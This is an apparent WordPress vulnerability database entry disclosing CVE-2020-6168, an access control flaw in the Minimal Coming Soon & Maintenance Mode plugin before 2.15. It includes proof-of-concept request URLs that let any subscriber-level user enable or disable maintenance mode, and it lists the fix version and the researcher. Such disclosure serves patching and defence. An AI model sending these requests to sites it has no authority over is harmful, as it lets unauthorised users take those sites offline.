Minimal Coming Soon & Maintenance Mode < 2.15 – Insecure Permissions: Enable and Disable Maintenance Mode | CVE 2020-6168 | Plugin Vulnerabilities

Description

There was a flaw that allowed any authenticated user with subscriber permissions or above the ability to enable and disable maintenance mode on a vulnerable site by sending a simple request.

Proof of Concept

Login as a user with subscriber or above permissions and send the following request to enable maintenance mode:

/wp-admin/admin.php?action=csmm_change_status&new_status=enabled&redirect=/wp-admin/

Alternatively, send the following request to disable maintenance mode:

/wp-admin/admin.php?action=csmm_change_status&new_status=disabled&redirect=/wp-admin/

Affects Plugins

minimal-coming-soon-maintenance-mode

Fixed in 2.15

References

CVE

URL

https://www.wordfence.com/blog/2020/01/multiple-vulnerabilities-patched-in-minimal-coming-soon-maintenance-mode-coming-soon-page-plugin/

Miscellaneous

Original Researcher

Chloe Chamberland

Submitter

Chloe Chamberland

Submitter website

https://wordfence.com

Submitter twitter

Verified

No

WPVDB ID

5e14c168-c2bd-4797-9b12-0f3cf6fb3dcd

Timeline

Publicly Published

2020-01-08 (about 6 years ago)

Added

2020-01-08 (about 6 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2026-02-17

Title

Passster < 4.2.24 - Password Protection Bypass

Published

2016-09-26

Title

W3 Total Cache < 0.9.5 – Unauthenticated Security Token Bypass

Published

2020-04-29

Title

WordPress < 5.4.1 - Unauthenticated Users View Private Posts

Published

2014-08-01

Title

Jetpack <= 2.9.2 - class.jetpack.php XML-RPC Access Control Bypass

Published

2019-01-25

Title

Total Donations - Update Arbitrary WordPress Option Values